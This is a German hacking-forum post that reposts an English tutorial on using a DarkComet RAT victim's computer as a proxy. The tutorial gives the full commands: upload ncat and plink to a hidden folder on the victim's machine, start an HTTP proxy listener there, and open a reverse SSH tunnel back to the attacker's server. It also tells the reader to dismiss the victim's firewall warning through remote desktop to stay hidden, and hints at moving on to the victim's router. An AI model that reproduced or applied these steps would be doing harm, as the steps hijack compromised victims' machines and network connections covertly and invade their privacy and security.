Anmelden
Benutzerkonto erstellen
Habs im www gefunden
bzw "Annohack" 
Noch nicht zum testen gekommen aber es klingt echt plausibel und es müsste funktionieren.
Copypaste Credits also an Annohack
Disclaimer : This post is for educational purposes of learning network security.
I am not responsible what you do with this information.
How to use your slave's connection to browse the internet.
So you want to surf using a dark comet slave? Wait, there is an option in Dark Comet to turn the slave into a proxy! Oh wait, it doesn't work? Why not?
Because your slave is most likely behind a router and you lack basic firewall understanding. Come sit children, and AnonHack will show you the way.
What you will need:
- SSH Server - best bet would be to install OPENSSH on your computer
- A port forward rule on port 22 to your ssh server on your router
- A browser where you can use proxy settings - I recommend using foxyproxy w/ firefox
- Plink
- ncat - a command line tcp/ip tool.
- Slave (DarkComet Victim)
Because your slave is behind a router, he essentially has a poor man's firewall from the outside world. The whole reason you can see the slave online after ratting is because the slave's computer is making an outbound connection to your ip which is then being forwarded to the computer on your network that you specified when port forwarding. Open up a port on your router/firewall to point to the same machine and install openSSH server.
Now find an good place to upload plink.exe and ncat.exe on the slave's machine. I recommend C:/users/[USERNAME]/appdata .. Make sure the user can't find those files.
Now On Dark Comet, open up the remote shell tab. This will give you a command prompt on the slave's machine. Navigate to the directory where you uploaded ncat & plink.exe in.
Type in the following:
ncat.exe -lvk 8080 --proxy-type http --allow *.*.*.*
You've officially started a proxy server on the slave's machine. BE WARNED when you do this they might get a firewall popup that asks them to keep blocking or unblock.
My recommendation is to use the remote desktop and watch the slave machine and click the "unblock" button quickly to remain stealthy.
Now you can't just use the proxy server yet because your slave is behind a router, and a direct connection is just going to get refused. Now comes the reverse
SSH tunnel which will allow you to tunnel traffic through it.
Close the remote shell window in Dark Comet and reopen it, the ncat listener is still being run in the background on the slave's machine so don't worry.
Now type in the following:-
plink.exe -R 3128:127.0.0.1:8080 [youripaddress] -l [yoursshlogin] -pw [yoursshpw]
It's going to ask you if u want to cache the server, yadda yadda..type N for no. Because you don't want to leave a footprint on the slave's machine. At this point you should be left with a shell to your ssh server, from the remote shell..(I know, it's confusing...shell in a shell!)
What did we just do?
Let me break it down. You're making an ssh connection back to your ssh server from the slave. SSH is very useful for tunneling traffic mostly because you don't need to keep adding port
forwarding rules to your router and the traffic is encrypted.
plink.exe - obviously this is executable you are running on the slave's machine
-R - this is the remote directive. When you make a connection, it will open up a port on the server and a port on the local machine
3128 this is the port on the ssh server you're opening up... this is the address you're going to hit on the SLAVE'S Network once you tunnel traffic through port 3128 on YOUR network (hint...you could just change this if you were interested in hitting a machine on the same network as the slave..use your imagination)
8080 this is the port you're going to come out on @
Now the last thing to do is setup the browser to use foxy proxy or another proxy tool to point at on port 3128. This traffic will be piped through the attacker's port
3128 which is part of the ssh tunnel and send it to the local machine on the slave's end on port 8080, which is the ncat listener/proxy. Go to google in the browser
and type in "what's my ip address" It should be your slave's wan address now, which would match up to what you have in the dark comet window.
Quick summary logic.
- Install ssh server on attacking machine
- Port forward port 22 on your router to the ssh server computer
- Upload ncat and plink to slave in a discreet place
- start ncat listener in remote shell window : ncat.exe -lvk 8080 --proxy-type http --allow *.*.*.*
- close remote shell window and reopen, run plink.exe -R 3128:127.0.0.1:8080 [youripaddress] -l [yoursshlogin] -pw [yoursshpw]
- setup attacking browser to proxy connection to on port 3128.
Now use your imagination to what you can access from here? (hint: slave's router maybe?)
Please show some love if this guide helped you. It was made with alot of experimentation and patience.
Nach oben
Melden
Tutorials
Vorstellungen / Bewerbungen
Hacking & Security
